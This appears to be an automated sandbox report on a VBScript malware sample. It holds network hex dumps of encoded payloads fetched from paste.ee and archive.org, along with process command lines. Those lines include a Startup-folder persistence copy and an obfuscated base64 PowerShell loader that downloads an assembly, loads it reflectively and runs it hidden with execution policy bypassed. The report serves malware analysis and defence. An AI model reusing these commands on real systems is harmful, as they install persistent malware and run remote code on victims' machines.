                                            2024-09-25 13:26:23 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                            Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                            2024-09-25 13:26:23 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                            Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                            2024-09-25 13:26:23 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                            Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                            2024-09-25 13:26:23 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                            Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.949708188.114.96.34437348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-25 13:26:33 UTC67OUTGET /d/Sk1Jg/0 HTTP/1.1
                                            Host: paste.ee
                                            Connection: Keep-Alive
                                            2024-09-25 13:26:33 UTC1224INHTTP/1.1 200 OK
                                            Date: Wed, 25 Sep 2024 13:26:33 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: max-age=2592000
                                            strict-transport-security: max-age=63072000
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1; mode=block
                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vXiB4z%2BypUKX9ydPrGBrQQYICDVpau01%2B6Ci9RBJWlsVtWvtwz%2F%2FHGGd5gU121j%2Bn%2Bq1vuKXWknntFWL%2Ft%2FOq%2BtS3uWkiFyczI%2FHJ%2FcL%2BohI9AQbhicDRQMI%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8c8b58b8ed9142e2-EWR
                                            2024-09-25 13:26:33 UTC145INData Raw: 31 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                            Data Ascii: 1f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                            2024-09-25 13:26:33 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                            2024-09-25 13:26:33 UTC1369INData Raw: 68 35 47 49 69 41 6a 4c 77 34 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 48 49 35 52 58 61 30 35 57 5a 6b 6c 55 65 73 4a 57 62 6c 4e 33 63 68 78 44 49 67 6f 51 44 2b 49 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 46 64 7a 56 6d 5a 70 35 57 59 74 42 69 49 78 59 6e 4c 74 4e 58 59 36 30 32 62 6a 31 43 64 6d 39 32 63 76 4a 33 59 70 31 57 4c 7a 46 57 62 6c 68 32 59 7a 70 6a 62 79 56 6e 49 39 4d 6e 62 73 31 47 65 67 6b 48 62 69 31 57 5a 7a 4e 58 59 38 6f 51 44 2b 38 6a 49 7a 56 57 65 69 30 54 5a 75 39 47 62 68 52 6d 62 68 52 33 63 67 49 43 4f 74 59 45 56 56 4a 53 50 6e 35 57 61 6b 39 32 59 75 56 47 49 69 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 32 42 43 62 74 68 33 50 38 38 37 75 76 44 41 41 41 41 41 41 41 41 41 4d 41 34 43 41 77 41 67 4c 41 41 44
                                            Data Ascii: h5GIiAjLw4CMuEjI942bpNnclZHI5RXa05WZklUesJWblN3chxDIgoQD+ICMuEjI942bpNnclZFdzVmZp5WYtBiIxYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegkHbi1WZzNXY8oQD+8jIzVWei0TZu9GbhRmbhR3cgICOtYEVVJSPn5Wak92YuVGIiAjLxISPu9WazJXZ2BCbth3P887uvDAAAAAAAAAMA4CAwAgLAAD
                                            2024-09-25 13:26:33 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 49 41 55 79 2f 41 41 41 41 41 41 41 62 73 52 6d 4c 6c 56 6d 63 76 4e 32 63 74 42 67 62 70 46 57 54 6c 68 58 52 79 39 32 51 66 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 6c 51 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 58 36 46 41 41 41 41 41 41 41 41 41 41 41 41 41 58 43 45 41 41 41 41 41 77 34 43 4d 75 41 6a 4c 78 63 41 41 42 77 41 41 41 51 57 4d 35 55 6a 4d 69 56 47 4f 69 56 6d 4d 33 30 79 59 30 4d 57 4f 74 59 6a 4e 69 52 54 4c 68 52 47 5a 30 30 69 5a 32 49 44 4e 6c 56 47 4f 34 51 43 41 42 6b 53 41 7a 64 33 62 79 68 47 56 75 39 57 61
                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEIAUy/AAAAAAAbsRmLlVmcvN2ctBgbpFWTlhXRy92QfBAAAAAAAAAAAAAAAAAAAAwlQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAX6FAAAAAAAAAAAAAXCEAAAAAw4CMuAjLxcAABwAAAQWM5UjMiVGOiVmM30yY0MWOtYjNiRTLhRGZ00iZ2IDNlVGO4QCABkSAzd3byhGVu9Wa
                                            2024-09-25 13:26:33 UTC1369INData Raw: 59 45 49 67 41 43 49 45 67 42 67 30 41 43 49 45 67 41 67 55 51 70 42 4b 52 56 42 4b 52 41 41 67 51 6f 42 47 42 43 49 45 77 41 67 67 51 58 42 47 42 41 67 55 51 6e 42 4b 42 41 41 55 51 6d 42 4b 42 41 67 55 51 6c 42 4b 42 41 67 55 67 44 4f 45 67 41 41 55 51 6a 42 47 68 44 42 41 67 42 63 45 51 41 67 51 41 43 43 6b 59 67 52 34 41 43 45 41 51 43 4f 45 59 67 53 45 41 41 47 30 58 67 52 45 51 41 41 59 67 41 42 45 41 41 45 45 58 67 52 45 51 41 67 59 51 61 42 47 42 43 4f 34 67 44 64 51 41 41 4b 55 51 48 43 34 51 48 52 43 6f 45 43 63 77 42 4f 30 68 44 42 41 51 42 52 43 6f 45 52 43 6f 45 52 43 6f 45 52 43 6f 45 45 63 67 44 43 77 52 6b 41 4b 52 42 64 55 51 48 64 49 68 42 48 30 51 53 42 47 42 43 43 49 41 49 48 49 41 45 63 45 67 41 41 59 51 6b 41 4b 52 41 48 55 41 48 64
                                            Data Ascii: YEIgACIEgBg0ACIEgAgUQpBKRVBKRAAgQoBGBCIEwAggQXBGBAgUQnBKBAAUQmBKBAgUQlBKBAgUgDOEgAAUQjBGhDBAgBcEQAgQACCkYgR4ACEAQCOEYgSEAAG0XgREQAAYgABEAAEEXgREQAgYQaBGBCO4gDdQAAKUQHC4QHRCoECcwBO0hDBAQBRCoERCoERCoERCoEEcgDCwRkAKRBdUQHdIhBH0QSBGBCCIAIHIAEcEgAAYQkAKRAHUAHd
                                            2024-09-25 13:26:33 UTC1369INData Raw: 62 77 31 57 5a 55 6c 58 54 4b 41 51 41 59 34 67 44 42 49 41 49 46 41 41 41 41 41 41 41 42 41 51 41 49 30 55 45 42 45 41 49 46 41 41 41 41 45 41 42 41 41 41 41 43 51 41 67 41 41 41 41 45 77 54 45 47 4d 51 43 47 49 51 50 53 59 77 41 46 30 52 42 64 45 41 41 47 55 51 48 4f 49 67 41 41 59 67 44 4f 45 41 41 45 55 51 48 4f 45 41 41 46 34 51 42 64 45 41 41 46 77 54 45 38 45 52 41 41 59 41 43 35 49 42 47 49 4d 41 41 48 67 42 41 41 4d 51 4e 52 59 77 41 49 41 41 41 44 67 54 45 47 4d 41 4f 52 41 68 41 42 41 67 42 49 34 51 41 41 51 51 4d 53 59 77 41 41 6f 48 41 35 42 41 65 41 63 48 41 32 42 51 64 41 51 48 41 7a 42 67 63 41 45 48 41 77 42 77 62 41 34 47 41 74 42 41 62 41 73 47 41 71 42 51 61 41 67 47 41 6e 42 67 5a 41 55 47 41 6b 42 77 59 41 49 47 41 68 52 6a 44 43 45
                                            Data Ascii: bw1WZUlXTKAQAY4gDBIAIFAAAAAAABAQAI0UEBEAIFAAAAEABAAAACQAgAAAAEwTEGMQCGIQPSYwAF0RBdEAAGUQHOIgAAYgDOEAAEUQHOEAAF4QBdEAAFwTE8ERAAYAC5IBGIMAAHgBAAMQNRYwAIAAADgTEGMAORAhABAgBI4QAAQQMSYwAAoHA5BAeAcHA2BQdAQHAzBgcAEHAwBwbA4GAtBAbAsGAqBQaAgGAnBgZAUGAkBwYAIGAhRjDCE
                                            2024-09-25 13:26:33 UTC1081INData Raw: 42 42 41 49 41 6b 43 41 59 42 41 49 41 4d 46 41 50 42 41 49 41 4d 47 41 68 42 51 54 41 41 43 41 6c 42 77 61 41 6b 47 41 73 42 41 49 41 45 44 41 66 42 41 4e 41 38 46 41 78 41 51 4d 41 41 43 41 54 42 77 54 41 41 43 41 6c 42 67 62 41 38 47 41 6f 42 41 55 41 6b 47 41 67 41 51 56 41 41 46 41 44 42 41 49 41 73 44 41 6c 42 67 62 41 38 47 41 6f 42 41 55 41 6b 47 41 6f 41 41 49 41 41 44 41 75 41 51 4e 41 38 43 41 68 42 41 62 41 77 47 41 70 42 67 65 41 38 47 41 4e 4e 52 67 41 41 41 4d 41 34 43 41 32 41 67 4e 41 38 43 41 34 42 77 62 41 59 47 41 6c 42 67 63 41 6b 47 41 47 42 41 49 41 45 44 41 77 41 51 4d 41 41 44 41 77 41 51 4d 41 41 44 41 79 41 77 4c 41 38 47 41 72 42 77 59 41 55 47 41 48 42 41 49 41 6b 43 41 77 41 67 4c 41 59 44 41 32 41 67 4f 41 59 48 41 79 42 41
                                            Data Ascii: BBAIAkCAYBAIAMFAPBAIAMGAhBQTAACAlBwaAkGAsBAIAEDAfBANA8FAxAQMAACATBwTAACAlBgbA8GAoBAUAkGAgAQVAAFADBAIAsDAlBgbA8GAoBAUAkGAoAAIAADAuAQNA8CAhBAbAwGApBgeA8GANNRgAAAMA4CA2AgNA8CA4BwbAYGAlBgcAkGAGBAIAEDAwAQMAADAwAQMAADAyAwLA8GArBwYAUGAHBAIAkCAwAgLAYDA2AgOAYHAyBA
                                            2024-09-25 13:26:33 UTC1369INData Raw: 32 30 30 30 0d 0a 5a 41 63 48 41 76 42 41 54 41 38 47 41 55 39 41 41 41 63 47 41 7a 42 51 54 48 41 41 41 67 41 51 49 41 49 48 41 76 42 67 63 41 49 48 41 46 42 41 49 41 34 47 41 70 42 77 5a 41 55 48 41 73 42 41 55 64 41 41 41 44 42 51 52 41 51 30 42 41 41 77 51 41 34 45 41 46 64 41 41 41 4d 47 41 75 42 51 64 41 59 45 41 44 42 51 51 41 55 31 44 41 41 67 62 41 55 48 41 53 42 67 61 41 34 47 41 70 31 41 41 41 4d 48 41 75 42 77 62 41 6b 47 41 30 42 41 63 41 38 45 41 75 42 51 64 41 49 56 46 41 41 51 65 41 49 48 41 6c 42 67 64 41 38 47 41 6a 42 51 5a 41 49 56 45 41 41 51 65 41 49 48 41 6c 42 67 64 41 38 47 41 6a 42 51 5a 41 49 46 41 75 42 51 64 41 49 31 46 41 41 51 5a 41 73 47 41 76 42 67 64 41 34 47 41 4a 31 41 41 41 34 47 41 31 42 67 55 48 41 41 41 75 42 51 61
                                            Data Ascii: 2000ZAcHAvBATA8GAU9AAAcGAzBQTHAAAgAQIAIHAvBgcAIHAFBAIA4GApBwZAUHAsBAUdAAADBQRAQ0BAAwQA4EAFdAAAMGAuBQdAYEADBQQAU1DAAgbAUHASBgaA4GAp1AAAMHAuBwbAkGA0BAcA8EAuBQdAIVFAAQeAIHAlBgdA8GAjBQZAIVEAAQeAIHAlBgdA8GAjBQZAIFAuBQdAI1FAAQZAsGAvBgdA4GAJ1AAA4GA1BgUHAAAuBQa
                                            2024-09-25 13:26:33 UTC1369INData Raw: 79 42 41 41 67 51 41 63 45 41 67 63 41 41 41 55 46 41 51 42 77 51 48 41 41 41 70 41 51 54 41 51 46 41 6f 41 51 5a 41 49 48 41 76 42 77 51 52 41 51 41 41 41 51 4b 41 49 46 41 6f 63 41 41 41 49 43 41 77 41 51 56 41 41 46 41 44 42 67 49 41 30 44 41 6b 42 51 61 41 55 47 41 6a 42 51 61 41 59 48 41 6c 42 41 5a 41 34 43 41 79 42 77 62 41 4d 48 41 7a 42 51 5a 41 4d 47 41 76 42 67 63 41 41 46 41 66 42 67 4d 41 4d 44 41 75 42 51 61 41 63 31 50 41 41 51 5a 41 30 47 41 68 42 67 54 4a 41 41 41 79 42 51 5a 41 77 47 41 73 42 77 62 41 49 48 41 30 42 67 62 41 38 47 41 44 42 77 62 41 55 47 41 6b 42 51 61 41 59 46 41 66 42 67 4d 41 4d 44 41 75 42 51 61 41 63 46 41 67 41 51 54 41 38 45 41 53 42 67 52 41 41 43 41 71 41 41 49 41 51 46 41 44 42 51 52 41 77 45 41 46 42 77 55 48
                                            Data Ascii: yBAAgQAcEAgcAAAUFAQBwQHAAApAQTAQFAoAQZAIHAvBwQRAQAAAQKAIFAocAAAICAwAQVAAFADBgIA0DAkBQaAUGAjBQaAYHAlBAZA4CAyBwbAMHAzBQZAMGAvBgcAAFAfBgMAMDAuBQaAc1PAAQZA0GAhBgTJAAAyBQZAwGAsBwbAIHA0BgbA8GADBwbAUGAkBQaAYFAfBgMAMDAuBQaAcFAgAQTA8EASBgRAACAqAAIAQFADBQRAwEAFBwUH
                                            2024-09-25 13:26:33 UTC1369INData Raw: 64 69 6c 6d 63 30 52 58 51 6b 6c 57 64 48 42 51 5a 30 56 6e 59 70 4a 48 64 30 46 55 65 30 6c 47 62 70 4a 57 61 30 46 47 63 74 39 32 51 6c 31 57 61 30 35 57 64 53 42 51 5a 30 56 6e 59 70 4a 48 64 30 46 30 63 75 39 57 61 30 46 47 65 68 78 57 5a 53 35 32 62 70 52 58 59 73 6c 47 63 74 39 32 51 41 51 6d 62 70 74 45 64 31 39 57 65 68 78 45 41 6c 52 58 64 69 6c 6d 63 30 52 58 51 30 56 33 62 35 46 47 54 30 4e 57 64 79 52 33 55 41 77 47 62 6b 35 53 5a 79 39 32 51 49 4e 46 41 73 78 47 5a 75 49 7a 4d 73 56 6d 62 79 56 32 61 41 77 47 62 6b 35 69 4d 7a 49 58 5a 7a 56 48 41 79 39 47 64 77 6c 6e 63 6a 35 57 52 6c 52 58 59 6c 4a 33 51 41 51 33 59 6c 70 6d 59 50 52 33 59 68 4a 48 64 69 56 33 55 41 55 47 5a 76 31 6b 62 76 6c 32 63 7a 56 6d 63 77 31 32 62 44 42 51 62 68 56
                                            Data Ascii: dilmc0RXQklWdHBQZ0VnYpJHd0FUe0lGbpJWa0FGct92Ql1Wa05WdSBQZ0VnYpJHd0F0cu9Wa0FGehxWZS52bpRXYslGct92QAQmbptEd19WehxEAlRXdilmc0RXQ0V3b5FGT0NWdyR3UAwGbk5SZy92QINFAsxGZuIzMsVmbyV2aAwGbk5iMzIXZzVHAy9Gdwlncj5WRlRXYlJ3QAQ3YlpmYPR3YhJHdiV3UAUGZv1kbvl2czVmcw12bDBQbhV


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:09:26:02
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs"
                                            Imagebase:0x7ff6bba20000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:09:26:02
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
                                            Imagebase:0x7ff782ad0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:09:26:02
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:09:26:02
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\PING.EXE
                                            Wow64 process (32bit):false
                                            Commandline:ping 127.0.0.1 -n 10
                                            Imagebase:0x7ff6b7290000
                                            File size:22'528 bytes
                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:09:26:12
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
                                            Imagebase:0x7ff760310000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:09:26:18
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                            Imagebase:0x7ff760310000
                                            File size:452'608 bytes
